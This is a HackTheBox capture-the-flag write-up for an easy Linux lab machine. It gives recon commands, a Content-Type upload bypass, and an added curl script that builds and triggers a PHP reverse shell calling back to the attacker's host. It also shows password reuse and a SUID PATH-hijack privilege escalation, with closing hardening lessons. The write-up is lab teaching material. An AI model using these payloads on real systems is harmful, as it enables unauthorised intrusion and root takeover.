[HTB] Machine Example Writeup

Platform: HackTheBox
Machine: Machine Example
OS: Linux
Difficulty: Easy
Points: 20
Release: 2026-01-15
IP Address: 10.10.10.100
Tags: linux, web, privesc

## Summary

Machine Example is an easy Linux box. The foothold comes from an upload portal that trusts the client-supplied Content-Type, which lets us upload a PHP reverse shell. Database credentials in the web application's config are reused for the developer account, and a SUID root backup binary that calls tar through a relative path gives us root via PATH hijacking.

## Reconnaissance

### Nmap Scan

Start with a full-port scan with version detection and default scripts:

$ nmap -sCV -p- -oA nmap/machine-example 10.10.10.100

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Upload Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)

Only two ports are open: SSH on 22 and Apache on 80. OpenSSH 8.2p1 with Apache 2.4.41 is the Ubuntu 20.04 pairing, so nothing here is obviously outdated and the web application is the attack surface.

### Web Enumeration

Visiting the site shows an upload portal. Enumerate directories to find where uploads land:

$ gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirb/common.txt

/uploads              (Status: 301)
/admin                (Status: 403)
/index.php            (Status: 200)

## Initial Foothold

### File Upload Bypass

The upload portal only accepts images, but the check turns out to be on the client-supplied Content-Type header rather than on the file contents or the stored extension. Bypass it with a PHP reverse shell:

# Copy the pentestmonkey reverse shell and point it at our listener
# (the file ships with $ip = '127.0.0.1' and $port = 1234)
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
$ sed -i 's/127\.0\.0\.1/10.10.14.5/; s/\$port = 1234;/$port = 4444;/' shell.php.jpg

# The .jpg suffix gets past the browser-side filter. Intercept the upload
# in Burp and change two things in the multipart part:
#   Content-Type: image/jpeg   (the only thing the server checks)
#   filename="shell.php"       (so Apache hands the file to PHP)

The server stores the file under the supplied filename, so the shell is reachable at /uploads/shell.php.
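The same bypass scripted with curl so it can be repeated without Burp. This is an added example, not code from the original writeup: the form field name `file` and the POST target `/index.php` are assumptions (read the real values from the intercepted request), and the PHP payload is a constructed minimal reverse shell standing in for the pentestmonkey one.

```shell
#!/bin/bash
# Added example, not from the original writeup. Builds a minimal PHP reverse
# shell and uploads it with the client-supplied Content-Type set to image/jpeg
# while the stored filename stays shell.php.
# Assumptions (hypothetical, read the real values from the Burp capture):
#   - the form posts to /index.php with a multipart field named "file"
#   - uploads land in /uploads/ under the supplied filename
LHOST="${LHOST:-10.10.14.5}"   # our tun0 address
LPORT="${LPORT:-4444}"         # nc -lvnp port
TARGET="${TARGET:-http://10.10.10.100}"

# Write a constructed minimal reverse shell to $1 and print the path.
# proc_open wires the socket to sh's stdin/stdout/stderr directly, which is
# more reliable under Apache than the "<&3" fd trick used in php -r one-liners
# (Apache already has other descriptors open, so the socket is not fd 3).
make_payload() {
    local out="$1"
    cat > "$out" <<EOF
<?php
\$sock = fsockopen("$LHOST", $LPORT);
\$proc = proc_open("/bin/sh -i", [0 => \$sock, 1 => \$sock, 2 => \$sock], \$pipes);
EOF
    printf '%s\n' "$out"
}

# Upload $1. curl's -F syntax sets the part's Content-Type and the filename the
# server sees; the file on disk can keep its .jpg name. Prints the HTTP status.
upload_payload() {
    local file="$1"
    curl -s -o /dev/null -w '%{http_code}' \
        -F "file=@${file};type=image/jpeg;filename=shell.php" \
        "$TARGET/index.php"
}

# Request the uploaded script so PHP executes it. The request blocks for as
# long as the shell lives, so it runs in the background.
trigger_payload() {
    curl -s "$TARGET/uploads/shell.php" >/dev/null 2>&1 &
}

# Usage: start `nc -lvnp 4444` in another terminal, then run with --run.
if [ "${1:-}" = "--run" ]; then
    payload=$(make_payload shell.php.jpg)
    echo "upload status: $(upload_payload "$payload")"
    trigger_payload
fi
```

If the upload comes back with a redirect or a 200 but the shell never connects, check the stored filename in /uploads first: a server that rewrites names or appends the original extension needs a different bypass than a Content-Type lie.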

### Getting a Shell

# Start listener
$ nc -lvnp 4444

# Trigger the shell
$ curl http://10.10.10.100/uploads/shell.php

# We get a connection!
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.100] 48234
$ whoami
www-data

### Shell Upgrade

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@machine:/var/www/html$ export TERM=xterm
www-data@machine:/var/www/html$ ^Z
$ stty raw -echo; fg

## User Flag

Looking around the web root, we find database credentials in the application's config:

www-data@machine:/var/www/html$ cat config.php
<?php
$db_user = "admin";
$db_pass = "SuperSecretPass123!";
?>

The database password is reused for the local user developer:

www-data@machine:/var/www/html$ su developer
Password: SuperSecretPass123!

developer@machine:~$ cat user.txt
HTB{f4k3_us3r_fl4g_h3r3}

## Privilege Escalation

### Enumeration

Let's check for SUID binaries (-type f skips directories, which can also carry the bit):

developer@machine:~$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/opt/backup  <-- Interesting!

### Exploiting the SUID Binary

The /opt/backup binary is SUID root (confirm the owner with ls -l) and, judging by its strings, invokes tar by bare name, so the command is resolved through the caller's PATH:

developer@machine:~$ strings /opt/backup
...
tar -czf /backups/backup.tar.gz /var/www/html
...

We can exploit this via PATH hijacking: a SUID binary inherits our PATH, so a fake tar placed first in it runs with effective uid 0. One caveat: bash drops an effective uid that differs from the real uid unless started with -p, so the fake tar has to ask for it (or use /bin/sh, which is dash on Ubuntu and does not drop privileges):

# Create malicious tar (-p keeps the inherited euid 0 in bash)
developer@machine:~$ echo '#!/bin/bash -p' > /tmp/tar
developer@machine:~$ echo 'chmod +s /bin/bash' >> /tmp/tar
developer@machine:~$ chmod +x /tmp/tar

# Put /tmp first in PATH and run the binary
developer@machine:~$ export PATH=/tmp:$PATH
developer@machine:~$ /opt/backup

# Now bash is SUID root; -p keeps the effective uid instead of dropping it
developer@machine:~$ /bin/bash -p
bash-5.0# whoami
root
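The hijack above, reproduced in a scratch directory as an added example (not code from the original writeup, and not involving any SUID bit): a stand-in for /opt/backup that runs tar by bare name, as the strings output suggests, next to a hardened variant that pins /bin/tar and resets PATH. The lab directory layout, the marker file and the stand-in scripts are this example's own constructs. The fake tar uses /bin/sh rather than bash because, in a real SUID context, bash drops an effective uid that differs from the real uid unless started with -p, while dash does not.

```shell
#!/bin/bash
# Added example, not from the original writeup. Simulates the /opt/backup
# PATH hijack in a throwaway directory with no SUID bit involved, then shows
# that the hardened variant is immune to the same attacker-controlled PATH.

# Build a lab dir with: a fake tar that drops a marker, a vulnerable target
# that calls tar by bare name, and a hardened target. Prints the directory.
setup_lab() {
    local lab
    lab=$(mktemp -d)
    mkdir -p "$lab/bin" "$lab/src"
    echo "hello" > "$lab/src/data"   # constructed input for the "backup"

    # Our "tar": records that it ran (and as whom), then exits.
    cat > "$lab/bin/tar" <<EOF
#!/bin/sh
echo "hijacked as \$(id -un)" > "$lab/marker"
EOF
    chmod +x "$lab/bin/tar"

    # Vulnerable stand-in for /opt/backup: bare command name, inherited PATH.
    cat > "$lab/backup_vuln" <<EOF
#!/bin/sh
tar -cf "$lab/backup.tar" -C "$lab/src" data
EOF
    # Hardened variant: absolute path, and PATH reset to a known-good value
    # before anything else runs. This is what a SUID helper should do.
    cat > "$lab/backup_safe" <<EOF
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
/bin/tar -cf "$lab/backup.tar" -C "$lab/src" data
EOF
    chmod +x "$lab/backup_vuln" "$lab/backup_safe"
    printf '%s\n' "$lab"
}

# Run $2 inside $1 with the lab's bin/ prepended to PATH, exactly as
# `export PATH=/tmp:$PATH` did on the box. Returns 0 if the fake tar ran
# (marker present), 1 otherwise. The target's own exit status is ignored so
# the check does not depend on a real tar being installed.
run_hijack() {
    local lab="$1" target="$2"
    rm -f "$lab/marker"
    PATH="$lab/bin:$PATH" "$lab/$target" >/dev/null 2>&1 || true
    [ -f "$lab/marker" ]
}

# Usage: run with --demo to see both outcomes side by side.
if [ "${1:-}" = "--demo" ]; then
    lab=$(setup_lab)
    run_hijack "$lab" backup_vuln && cat "$lab/marker"
    run_hijack "$lab" backup_safe || echo "hardened target: fake tar never ran"
    rm -rf "$lab"
fi
```

Both targets are started with the same attacker-controlled PATH; only the one that resolves tar through it executes the planted script. On the real box the marker would have been a SUID /bin/bash rather than a text file, which is why SUID code should never call helpers by bare name through system() or a shell.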

## Root Flag

bash-5.0# cat /root/root.txt
HTB{f4k3_r00t_fl4g_h3r3}

## Lessons Learned

  • Validate uploads server-side: inspect the file contents rather than the client-supplied Content-Type, allowlist extensions, store files under generated names, and disable script execution in the upload directory
  • Never store credentials in plaintext configuration files, and never reuse a database password for a local account
  • In SUID binaries, execute helpers by absolute path and reset PATH (or avoid system() and the shell entirely), because the caller controls the environment
  • Regularly audit file permissions, starting with SUID/SGID binaries that did not come from the distribution's packages
─────────────────────────────────────
HackTheBox // Machine Example
ribeir.in
─────────────────────────────────────